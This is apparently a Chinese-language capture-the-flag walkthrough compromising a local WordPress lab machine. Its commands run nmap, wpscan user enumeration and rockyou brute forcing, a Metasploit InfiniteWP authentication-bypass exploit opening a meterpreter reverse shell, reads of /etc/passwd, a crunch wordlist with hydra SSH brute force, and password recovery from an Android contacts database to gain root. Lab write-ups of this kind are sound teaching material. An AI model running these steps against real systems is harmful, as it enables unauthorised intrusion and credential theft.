一、信息搜集
1.打开靶机,会看到一个ip地址
2.再打开kali,使用nmap探测端口信息
#nmap -A -sV 192.168.56.101
发现三个端口22,80,是开启,9090是关闭
探测出来是WordPress的CMS
二、漏洞利用
由于扫描发现知道是wordpress,所以用wpscan扫描
#wpscan --url http://192.168.56.101 -e u,p 是一个枚举用户名的插件
然后由扫描发现一个kitty的用户
接着用wpscan爆破密码
#wpscan --url http://192.168.56.101 -U kitty -P /usr/share/wordlists/rockyou.txt
没有什么结果。
使用插件尝试
wpscan --url http://192.168.56.101 -e u,p --plugins-detection mixed
扫描出一个插件iwp-client,通过查询,他是个有认证绕过的漏洞
打开msf
msfconsole
search InfiniteWP
use 0
show options
set rhosts 192.168.56.101
set username kitty
set lhost 192.168.8.130
run
meterpreter > shell
id
获取到一个id,权限是apache,然后开始提权
三、获取信息
通过查看发现两个用户
cat /etc/passwd|grep /bin/bash
查看根目录,发现一个kitty.txt文件
最下边有一段话,翻译得知,密码是$和猫的名字和出生年份组成
此时,访问192.168.56.101查看,是一个猫的图案,还对其做一简介,他叫Minouche
出生年份猜想一般是1000和2000开始
现在生成字典
M
i
n
o
u
c
h
e
1000
与
Minouche1000与
Minouche1000与Minouche2000
使用crunch生成字典
#crunch 13 13 -t "$"Minouche20%% -o /root/test/123
利用九头蛇爆破,得到正确密码
hydra -l kitty -P 123 ssh://192.168.56.10
登陆得到的账号和密码,发现该账号家目录下有一个flag文件
pwd
ls -al
发现有一个压缩文件
下载到本地查看
scp kitty@192.168.56.101 :~/android.zip /root/test 下载到本地test
输入密码$Minouche2005
cd /test /
ls -al
unzip android.zip解压
ls -al
cd date
ls -al
cd backup/
ls -al
find . -name *.db
在主机打开sqlite
找到/user_de/0/com.android.providers.contacts/databases/contacts2.db
看到一串字母
YouWillNeverGue$$This
在远程主机
cat /etc/passwd |grep /bin/bash
su root
用长串密码,登录成功
ls -al
cat root.txt